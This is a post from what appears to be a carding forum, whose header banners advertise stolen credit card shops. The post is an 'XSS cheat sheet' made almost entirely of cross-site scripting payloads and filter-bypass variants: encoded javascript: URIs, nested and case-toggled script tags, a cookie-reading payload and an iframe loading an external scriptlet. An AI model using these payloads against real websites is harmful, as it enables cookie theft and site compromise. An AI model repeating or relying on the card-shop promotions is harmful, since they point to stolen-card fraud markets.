Welcome!

By registering with us, you'll be able to discuss, share and private message with other members of our community.

SignUp Now!
banner Expire 25 April 2025
adv ex on 22 February 2024
Kfc Club

Patrick Stash
banner expire at 13 August 2024
BidenCash Shop
banner Expire 10 May 2025
Money Club cc shop
Luki Crown
Wizard's shop 2.0
Trump cc shop
Blackstash cc shop
Yale lodge shop
UniCvv
banner Expire 1 April 2021

Complete Cross site Scripting(XSS) cheat sheets : Part 1

P

Premiums

TRUSTED VENDOR
Joined
Dec 5, 2020
Messages
2,725
We are producing this XSS Cheat sheet after collecting the codes from hackers’ techniques and different sites especially http://ha.ckers.org/xss.html . This is complete list of XSS cheat codes which will help you to test xss vulnerabilities ,useful for bypassing the filters. If you have any different cheat codes , please send your code.


Basic XSS codes:
———————————-

<script>alert(“XSS”)</script>
Click to expand...


<script>alert(“XSS”);</script>
Click to expand...


<script>alert(‘XSS’)</script>
Click to expand...


“><script>alert(“XSS”)</script>
Click to expand...


<script>alert(/XSS”)</script>
Click to expand...


<script>alert(/XSS/)</script>
Click to expand...
When inside Script tag:
———————————

</script><script>alert(1)</script>
‘; alert(1);
‘)alert(1);//
Click to expand...
Bypassing with toggle case:
————————————–

<ScRiPt>alert(1)</sCriPt>
<IMG SRC=jAVasCrIPt:alert(‘XSS’)>
Click to expand...
XSS in Image and HTML tags:
———————————————

<IMG SRC=”javascript:alert(‘XSS’);”>
<IMG SRC=javascript:alert(&quot;XSS&quot;)>
<IMG SRC=javascript:alert(‘XSS’)>
Click to expand...


<img src=xss onerror=alert(1)>
<IMG “””><SCRIPT>alert(“XSS”)</SCRIPT>”>
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=”jav ascript:alert(‘XSS’);”>
Click to expand...


<IMG SRC=”jav&#x09;ascript:alert(‘XSS’);”>
Click to expand...


<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
Click to expand...


<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
Click to expand...


<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
Click to expand...


<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
Click to expand...


<BODY ONLOAD=alert(‘XSS’)>
<INPUT TYPE=”IMAGE” SRC=”javascript:alert(‘XSS’);”>
<IMG SRC=”javascript:alert(‘XSS’)”
Click to expand...


<iframe src=http://ha.ckers.org/scriptlet.html <
Click to expand...
Bypass the script tag filtering:
————————————————–

<<SCRIPT>alert(“XSS”);//<</SCRIPT>
Click to expand...


%253cscript%253ealert(1)%253c/script%253e
Click to expand...


“><s”%2b”cript>alert(document.cookie)</script>
Click to expand...


foo<script>alert(1)</script>
Click to expand...


<scr<script>ipt>alert(1)</scr</script>ipt>
Click to expand...
Using String.fromCharCode function:
—————————————————–

<SCRIPT>String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)</SCRIPT>
Click to expand...


‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//–></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
Click to expand...
You can combine the above mentioned codes and make your own cheat code.

Note:
We are extending the cheat sheet. Soon we will publish the part 2.
 
You must log in or register to reply here.

Online statistics

Members online
254
Guests online
658
Total visitors
912
Totals may include hidden visitors.

Latest posts

Newest members

Stay Connected

Top Bottom